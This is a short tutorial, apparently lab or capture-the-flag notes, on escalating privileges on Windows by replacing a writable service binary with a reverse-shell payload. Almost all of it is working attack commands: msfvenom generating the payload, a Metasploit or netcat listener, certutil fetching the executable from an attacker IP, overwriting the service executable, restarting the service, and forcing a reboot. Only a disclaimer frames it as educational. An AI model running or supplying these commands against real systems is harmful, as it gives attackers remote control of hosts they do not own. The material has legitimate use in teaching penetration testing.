Disclaimer: This material is provided solely for educational purposes. You are fully responsible for how you use the information.
We do not encourage any kind of illegal or harmful activity.

EXPLOITING SERVICE WITH METASPLOIT

1. we can use msfvenom to create a reverse shell payload
   msfvenom -p windows/x64/shell_reverse_tcp LHOST=[IP-ADRESS] LPORT=[PORT] -f exe-service -o reverse.exe

   

   NOTE

   If we had found this service running from the Program Files (x86) folder, we may want to consider making a 32-bit executable, as a 64-bit one may not work for the service.

2. Start your listener on the attacking machine
   msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT [PORT]; run"

   

   NOTE

   Alternatively, we can start a listener using nc: sudo rlwrap -cAr nc -lvnp 1338.

3. After Strarting listener, transfer reverse.exe to the target machine.
   certutil -urlcache -f http://10.11.92.52:8000/reverse.exe reverse.exe

   

4. To exploit the service, replace filepermservice.exe with reverse.exe, while maintaining the original binary name.

   Copy-Item -Path "C:\Temp\reverse.exe" -Destination "C:\Program Files\File Permissions Service\filepermservice.exe" -Force

   

   NOTE

   For cmd, we can use the following command: copy /y c:\Temp\reverse.exe "c:\Program Files\File Permissions Service\filepermservice.exe"

5. Now, all we have to do is run sc stop filepermsvc , sc start filepermsvc or net start filepermsvc on the target Machine to execute the exploit.

   

   IMPORTANT

   If SeShutdownPrivilege is enabled you can reboot to have the service to restart automatically.

   shutdown /r /t 0 /f